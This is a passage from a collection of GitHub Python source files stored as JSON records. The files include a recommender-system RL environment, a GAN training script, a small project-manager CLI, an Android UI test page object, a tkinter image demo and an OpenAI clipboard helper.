Tree element\n\n Args:\n type_element: the type element as a Element from an ElementTree\n\n Returns:\n a argument type\n '''\n\n if type_element.attrib['supertype'] == 'enumerable':\n options = type_element.text.split('\\n')\n options = [option.strip() for option in options\n if option.strip() != '']\n argtype = Enumerable(options=options)\n else:\n raise Exception('unknown argtype %s' % type_element.supertype)\n\n return argtype\n","repo_name":"vrenkens/assist","sub_path":"assist/tasks/argtypes/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"56"} +{"seq_id":"39670386363","text":"#!/usr/bin/python\n# encoding: utf-8\n\nimport numpy as np\nimport ipdb\nimport numpy as np\nimport ipdb\nfrom .. import logger\nfrom sklearn.model_selection import train_test_split\nfrom collections import OrderedDict\nfrom ..util import *\nimport math\nfrom collections import Counter\nimport copy as cp\n\n# TODO:\nclass env(object):\n def __init__(self, args, dls, ui_cls = None):\n logger.log(\"initialize environment\")\n self.T = args.T\n self.rates = {}\n self.items = {}\n self.users = {}\n self.utypes = {}\n self.utype_kind = {}\n self.ideal_list = {}\n self.args = args\n self.dls = dls\n self.ui_cls = ui_cls\n\n p_data = dls.pre_training_data\n\n item_id2iid = {}\n\n def _load_data(data):\n for index, row in data.iterrows():\n uid = row.user_id\n item_id = row.item_id\n rating = row.rating\n if uid not in self.rates:\n self.rates[uid] = {}\n \n if item_id not in item_id2iid:\n item_id2iid[item_id] = len(item_id2iid) + 1\n\n iid = item_id2iid[item_id]\n\n self.rates[uid][iid] = rating\n \n self.items[iid] = rating # maintain api\n \n _load_data(p_data)\n\n for online_id in dls.online_id_stat:\n id_data = dls.grouped_data.get_group(online_id)\n _load_data(id_data) \n\n # with open(path_join(self.args.data_path, \"env.dat\"), \"r\") as f:\n # for line in f:\n # line = line.strip(\"\\n\").split(\"\\t\")\n # iid = list(map(lambda x:x.split(\":\"),line[1:]))\n # self.rates[int(line[0])] = {int(i[0]):int(i[1]) for i in iid}\n # for i in iid: self.items[int(i[0])]=int(i[1]) # 只用来统计 self.item_num 用\n\n logger.log(\"user number: \" + str(len(self.rates) + 1))\n logger.log(\"item number: \" + str(len(self.items) + 1))\n logger.log(\"user type\"\n \" number: \" + str(len(self.utype_kind) + 1))\n \n # self.setup_train_test()\n self.setup_train_test_()\n\n @property\n def user_num(self):\n return len(self.rates) + 1\n\n @property\n def item_num(self):\n return len(self.items) + 1\n\n @property\n def utype_num(self):\n return len(self.utypes) + 1\n\n def setup_train_test(self):\n users = list(range(1, self.user_num))\n np.random.shuffle(users)\n self.training, self.validation, self.evaluation = np.split(np.asarray(users), [int(.85 * self.user_num - 1),\n int(.9 * self.user_num - 1)])\n\n def setup_train_test_(self):\n self.training = np.array(self.dls.pre_training_data[\"user_id\"].drop_duplicates())\n\n self.evaluation = np.array(self.dls.online_id_stat)\n\n def reset(self):\n self.reset_with_users(np.random.choice(self.training))\n\n def reset_with_users(self, uid):\n self.state = [(uid,1), []]\n self.short = {}\n return self.state\n\n def step(self, action):\n \"\"\"\n self.rates: \n dict: uid -> rating_dict\n rating_dict:item_id -> rating\n \n self.state:\n list:\n 0:tuple (uid, xx)\n 1:list\n \"\"\"\n if action in self.rates[self.state[0][0]] and (not action in self.short):\n # rate = self.rates[self.state[0][0]][action]\n # if rate >= 4:\n # reward = 1\n # else:\n # if self.dls.datan in [\"KuaiRec\"]:\n # reward = rate\n # else:\n # reward = 0\n \n online_round = len(self.state[1])\n uid = self.state[0][0]\n user = AbstractUser(uid, online_round)\n rate, reward = self.dls.feedback(user, action)\n\n else:\n rate = 0\n reward = 0\n\n if len(self.state[1]) < self.T - 1:\n done = False\n else:\n done = True\n self.short[action] = 1\n t = self.state[1] + [[action, reward, done]]\n info = {\"precision\": self.precision(t),\n \"recall\": self.recall(t, self.state[0][0]),\n \"rate\":rate}\n self.state[1].append([action, reward, done, info])\n return self.state, reward, done, info\n\n def step_policy(self,policy):\n policy = policy[:self.args.T]\n rewards = []\n for action in policy:\n if action in self.rates[self.state[0][0]]:\n rewards.append(self.rates[self.state[0][0]][action])\n else:\n rewards.append(0)\n t = [[a, rewards[i], False] for i,a in enumerate(policy)]\n info = {\"precision\": self.precision(t),\n \"recall\": self.recall(t, self.state[0][0])}\n self.state[1].extend(t)\n return self.state,rewards,True,info\n\n\n def ndcg(self, episode, uid):\n if len(self.rates[uid]) > len(episode):\n return self.dcg_at_k(list(map(lambda x: x[1], episode)),\n len(episode),\n method=1) / self.dcg_at_k(sorted(list(self.rates[uid].values()),reverse=True),\n len(episode),\n method=1)\n else:\n return self.dcg_at_k(list(map(lambda x: x[1], episode)),\n len(episode),\n method=1) / self.dcg_at_k(\n list(self.rates[uid].values()) + [0] * (len(episode) - len(self.rates[uid])),\n len(episode), method=1)\n\n def dcg_at_k(self, r, k, method=1):\n r = np.asfarray(r)[:k]\n if r.size:\n if method == 0:\n return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))\n elif method == 1:\n return np.sum(r / np.log2(np.arange(2, r.size + 2)))\n else:\n raise ValueError('method must be 0 or 1.')\n\n def alpha_dcg(self, item_list, k=10, alpha=0.5, *args):\n items = []\n G = []\n for i, item in enumerate(item_list[:k]):\n items += item\n G.append(sum(map(lambda x: math.pow(alpha, x - 1), dict(Counter(items)).values())) / math.log(i + 2, 2))\n return sum(G)\n\n def precision(self, episode):\n return sum([i[1] for i in episode])\n\n def recall(self, episode, uid):\n if self.dls.datan in [\"KuaiRec\"]:\n satisfield_num = (np.array(list(self.rates[uid].values())) >= 1).sum()\n else:\n satisfield_num = (np.array(list(self.rates[uid].values())) >= 4).sum()\n # if satisfield_num == 0:\n # return 0\n\n # return sum([i[1] for i in episode]) / len(self.rates[uid])\n return sum([i[1] for i in episode]) / satisfield_num\n\nclass AbstractUser:\n def __init__(self,id,online_round) -> None:\n self.online_round = online_round\n self.id = id","repo_name":"jzhang-0/iGCF","sub_path":"src/NICF/envs/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"73266043694","text":"import os\nimport argparse\n\nfrom utils import *\nfrom SalienGAN import SalienGAN\nimport torch\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--phase',type=str,default='train',help=\"train or test?\")\n parser.add_argument('--model_name',type=str,default='SalienGAN',help=\"model name\")\n parser.add_argument('--dataset',type=str,default='Hayao',help=\"dataset_name\")\n parser.add_argument(\"--batch_size\", type = int, default = 2,help = \"Size of each batches (Default: 128)\")\n parser.add_argument('--data_mean',type=list,default=[7.6287,-3.3273,-4.3014],help='data_mean(bgr) from data_mean.py')\n parser.add_argument('--epoch', type=int, default=101, help='The number of epochs to run')\n parser.add_argument('--init_epoch', type=int, default=8, help='The number of epochs for weight initialization')\n parser.add_argument('--save_freq', type=int, default=1, help='The number of ckpt_save_freq')\n\n parser.add_argument('--init_lr', type=float, default=2e-4, help='The learning rate')\n parser.add_argument('--g_lr', type=float, default=0.0002, help='The learning rate')\n parser.add_argument('--d_lr', type=float, default=0.0004, help='The learning rate')\n parser.add_argument(\"--beta1\", type = float, default = 0.5,help = \"Coefficients used for computing running averages of gradient and its square\")\n parser.add_argument(\"--beta2\", type = float, default = 0.99,help = \"Coefficients used for computing running averages of gradient and its square\")\n\n parser.add_argument('--adv_g_weight', type=float, default=300.0, help='Weight of generator about GAN')\n parser.add_argument('--adv_d_weight', type=float, default=300.0, help='Weight of generator about GAN') #\n parser.add_argument('--content_weight', type=float, default=1.5, help='Weight about VGG19') # 1.1 for Shinkai\n parser.add_argument('--texture_weight', type=float, default=1.0, help='Weight about texture')\n parser.add_argument('--shading_weight', type=float, default=10.0, help='Weight about picture color and shadiing')\n\n parser.add_argument('--img_size', type=list, default=[256,256], help='The size of image: H and W')\n\n parser.add_argument('--ch', type=int, default=64, help='base channel number per layer')\n parser.add_argument('--n_dis', type=int, default=3, help='The number of discriminator layer')\n parser.add_argument('--sn', type=str2bool, default=True, help='using spectral norm')\n\n parser.add_argument('--training_rate', type=int, default=1, help='training rate about G & D') #??\n parser.add_argument('--gan_type', type=str, default='lsgan', help='[gan / lsgan / wgan-gp / wgan-lp / dragan / hinge]')\n\n parser.add_argument(\"--gpu_id\", type = int, default = 0 ,help = \"Select the specific gpu to training\")\n\n parser.add_argument('--checkpoint_dir', type=str, default='checkpoint',help='Directory name to save the checkpoints')\n parser.add_argument('--result_dir', type=str, default='results',help='Directory name to save the generated images')\n parser.add_argument('--log_dir', type=str, default='logs',help='Directory name to save training logs')\n parser.add_argument('--sample_dir', type=str, default='samples',help='Directory name to save the samples on training')\n return check_args(parser.parse_args())\n\ndef check_args(args):\n # --checkpoint_dir\n check_folder(args.checkpoint_dir)\n if args.phase == 'test':\n # --result_dir\n check_folder(args.result_dir)\n\n # --log_dir\n check_folder(args.log_dir)\n\n # --sample_dir\n check_folder(args.sample_dir)\n\n # --epoch\n try:\n assert args.epoch >= 1\n except:\n print('number of epochs must be larger than or equal to one')\n\n # --batch_size\n try:\n assert args.batch_size >= 1\n except:\n print('batch size must be larger than or equal to one')\n return args\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n # Device\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.gpu_id)\n\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize Generator and Discriminator\n myGAN = SalienGAN(args, device)\n\n # Start Training\n myGAN.train(device)\n","repo_name":"ZhengjieFANG/SalienGAN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"22009430768","text":"import pathlib\r\nimport shutil\r\nimport numpy as np\r\nimport os\r\n\r\ndata = {0:\"\", 1:\"\", 2:\"\", 3:\"\", 4:\"\",5:\"\"}\r\n\r\ndef getCommands():\r\n u_input = str(input(\">> \"))\r\n u_output = u_input.split()\r\n i = 0\r\n for x in u_output:\r\n data[i] = x\r\n i = i + 1\r\n return data\r\n\r\ntry:\r\n logo = open(\"logo.txt\", \"r\")\r\n logo_rend = logo.read()\r\n print(logo_rend)\r\n while data[0] != \"quit\":\r\n getCommands()\r\n if data[0] == \"create\":\r\n path = pathlib.Path(data[2])\r\n new_dir = path / data[1]\r\n if new_dir.is_dir() != True:\r\n new_dir.mkdir(exist_ok=True)\r\n pack_dir = new_dir / f\"{data[1]}_lib\"\r\n pack_dir.mkdir(exist_ok=True)\r\n if data[3] == \"python\":\r\n main_file = open(f\"{new_dir}/{data[4]}.py\", \"w+\")\r\n pack_file = open(f\"{pack_dir}/__init__.py\",\"w+\")\r\n main_file,pack_file.write(\"\")\r\n if data[5] != \"\":\r\n main_file.write(f\"import {data[5]}\")\r\n main_file.close()\r\n pack_file,main_file.close()\r\n print(\">> Project created succesfully\")\r\n else:\r\n print(\"Invalid Input\\n\")\r\n elif data[0] == \"delete\":\r\n del_path = pathlib.Path(data[1])\r\n if del_path.is_dir() == True:\r\n shutil.rmtree(del_path)\r\n print(\"Project Deleted Succsesfully\\n\")\r\n elif data[0] == \"help\":\r\n print(\">> command guide:\\n1. create \\n2. delete \\n3. quit\\n\")\r\n getCommands()\r\n elif data[0] == \"quit\":\r\n print(\">> quitting Program...\\n\")\r\n else:\r\n print(\">> this command don't exist\")\r\nexcept IndexError:\r\n print(\">> invalid input\")\r\n","repo_name":"HoshiKami/project_manager","sub_path":"ProjectManager.py","file_name":"ProjectManager.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"41668338068","text":"# coding: utf-8\n\nfrom _common.page_object import PageObject\nfrom _common.xjb_decorator import robot_log\n\nimport huaxin_ui.ui_android_xjb_3_0.fund_assets_page\nimport time\n\nFUND_TYPE = \"xpath_//android.view.View[contains(@content-desc,'%s') and @focusable='true']\"\n\n\nclass FundAssetsStructurePage(PageObject):\n def __init__(self, web_driver):\n super(FundAssetsStructurePage, self).__init__(web_driver)\n\n @robot_log\n def verify_page_title(self):\n self.assert_values('资产结构', self.get_text(self.page_title, 'find_element_by_id'))\n\n page = self\n return page\n\n @robot_log\n def verify_fund_assets_structure_details(self):\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='资产配置']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='混合型']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='货币型']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='行业分布']\")))\n self.assert_values('True', str(self.element_exist(\"//android.view.View[@content-desc='债券品种']\")))\n\n page = self\n return page\n\n @robot_log\n def go_to_fund_assets_page(self, fund_type):\n time.sleep(2)\n self.perform_actions(\n FUND_TYPE % (fund_type)\n )\n\n page = huaxin_ui.ui_android_xjb_3_0.fund_assets_page.FundAssetsPage(self.web_driver)\n\n return page\n","repo_name":"wanglili1703/firewill","sub_path":"huaxin/huaxin_ui/ui_android_xjb_3_0/fund_assets_structure_page.py","file_name":"fund_assets_structure_page.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"19551911332","text":"\"\"\"\nAuthors: Marshall Jones, Johnny Lavette, and Eric Dyer\nProject 9\nFile: imagedemo.py\n\nThis program displays an image in a GUI with a caption about the Moon Man.\n\"\"\"\n\nfrom breezypythongui import EasyFrame\nfrom tkinter import PhotoImage\nfrom tkinter.font import Font\n\nclass ImageDemo(EasyFrame):\n \"\"\"Displays an image and a caption.\"\"\"\n\n def __init__(self):\n \"\"\"Sets up the window and widgets.\"\"\"\n EasyFrame.__init__(self, title = \"Image Demo\")\n self.setResizable(False)\n imageLabel = self.addLabel(text = \"\",\n row = 0, column = 0,\n sticky = \"NSEW\")\n textLabel = self.addLabel(text = \"Moon Man's silhouette stands out against the stark contrast of the beautiful Earth.\",\n row = 1, column = 0,\n sticky = \"NSEW\")\n \n # Load the image and associate it with the image label.\n self.image = PhotoImage(file = \"moon.gif\")\n imageLabel[\"image\"] = self.image\n\n # Set the font and color of the caption.\n font = Font(family = \"Verdana\", size = 12, slant = \"italic\")\n textLabel[\"font\"] = font\n textLabel[\"foreground\"] = \"blue\"\n\ndef main():\n \"\"\"The starting point for launching the program.\"\"\"\n ImageDemo().mainloop()\n\n# Instantiates and pops up the window.\nif __name__ == \"__main__\":\n main()\n","repo_name":"marshallbtc/CSCI-111","sub_path":"Project09/imagedemo.py","file_name":"imagedemo.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"35171310325","text":"#!/usr/bin/python3\n\nimport openai\nimport sys\n\nif sys.platform == \"win32\":\n import win32clipboard\n def to_clipboard(text):\n win32clipboard.OpenClipboard()\n win32clipboard.EmptyClipboard()\n win32clipboard.SetClipboardText(text)\n win32clipboard.CloseClipboard()\nelif sys.platform == \"darwin\":\n import subprocess\n def to_clipboard(text):\n process = subprocess.Popen(\n \"pbcopy\", env={\"LANG\": \"en_US.UTF-8\"}, stdin=subprocess.PIPE\n )\n process.communicate(text.encode(\"utf-8\"))\nelif sys.platform.startswith(\"linux\"):\n import subprocess\n def to_clipboard(text):\n process = subprocess.Popen(\n \"xsel --clipboard --input\", shell=True, stdin=subprocess.PIPE\n )\n process.communicate(text.encode(\"utf-8\"))\nelse:\n raise Exception(\"Unsupported platform\")\n\nopenai.api_key = \"YOUR_API_KEY\"\n\ndef generate_response(prompt):\n completions = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=prompt,\n max_tokens=1024,\n n=1,\n stop=None,\n temperature=0.5,\n )\n message = completions.choices[0].text\n return message\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n raise Exception(\"Invalid number of arguments\")\n\n if sys.argv[1] == \"-h\":\n print(\"Usage: python script.py [-c | phrase]\")\n print(\"-c: start an infinite loop to ask questions and receive answers\")\n print(\"phrase: the phrase to ask CHATGPT (enclosed in quotes if it contains spaces)\")\n elif sys.argv[1] != \"-c\":\n prompt = sys.argv[1]\n response = generate_response(prompt)\n print(response)\n to_clipboard(response)\n else:\n while True:\n prompt = input(\"Enter a question (or 'exit' to exit): \")\n if prompt.strip().lower() == \"exit\":\n break\n response = generate_response(prompt)\n print(response)\n to_clipboard(response)\n\n","repo_name":"AlrikRr/oi-gpt","sub_path":"oi-gpt.py","file_name":"oi-gpt.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"}